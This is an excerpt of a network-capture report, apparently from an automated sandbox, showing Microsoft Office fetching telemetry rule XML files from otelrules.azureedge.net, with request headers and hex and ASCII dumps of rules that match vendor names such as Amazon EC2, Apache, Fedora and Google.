                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cfmhggkx889x958tc000000029g000000009fms
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          58192.168.2.44982413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 425
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                          ETag: "0x8DC582BBA25094F"
                                                                                                                          x-ms-request-id: 0fbb1da2-e01e-0085-1521-1cc311000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cfvtw4hh2496wp8p800000003h000000000a92r
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          59192.168.2.44982213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 491
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B98B88612"
                                                                                                                          x-ms-request-id: 9ba87e07-d01e-008e-2ae9-1a387a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162139Z-17db6f7c8cfvzwz27u5rnq9kpc00000005hg00000000117q
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          60192.168.2.44982313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 448
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                          ETag: "0x8DC582BB389F49B"
                                                                                                                          x-ms-request-id: 95529de3-401e-0064-4a25-1b54af000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cfq2j6f03aq9y8dns00000004b0000000007wwn
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          61192.168.2.44982613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:40 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 479
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B989EE75B"
                                                                                                                          x-ms-request-id: 4508f1f3-f01e-0096-78e2-1a10ef000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cf96l6t7bwyfgbkhw00000004700000000048t7
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          62192.168.2.44982813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:40 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 471
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                          ETag: "0x8DC582B97E6FCDD"
                                                                                                                          x-ms-request-id: 24993946-c01e-008e-55d7-1a7381000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cfspvtq2pgqb2w5k000000004z000000000b48t
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          63192.168.2.44982513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:40 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 416
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                          ETag: "0x8DC582BAEA4B445"
                                                                                                                          x-ms-request-id: aaeb8d2a-d01e-0065-26e8-1bb77a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cfvtw4hh2496wp8p800000003f000000000eg1a
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          64192.168.2.44982913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:40 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                          ETag: "0x8DC582B9C710B28"
                                                                                                                          x-ms-request-id: 5d72a51a-801e-008f-7fe1-1a2c5d000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cfvzwz27u5rnq9kpc00000005d000000000aap8
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          65192.168.2.44982713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:40 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                          x-ms-request-id: 77f86656-001e-000b-08e7-1a15a7000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162140Z-17db6f7c8cfbr2wt66emzt78g400000004n000000000bmdv
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          66192.168.2.44983013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:41 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:41 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 477
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                          ETag: "0x8DC582BA54DCC28"
                                                                                                                          x-ms-request-id: 1a8c6729-d01e-0014-7547-1ced58000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162141Z-17db6f7c8cf9wwz8ehu7c5p33g00000002c0000000009tcw
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:41 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          67192.168.2.44983113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:41 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:41 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                          ETag: "0x8DC582BB7F164C3"
                                                                                                                          x-ms-request-id: c0284108-301e-005d-6416-1ce448000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162141Z-17db6f7c8cfspvtq2pgqb2w5k00000000510000000007m03
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
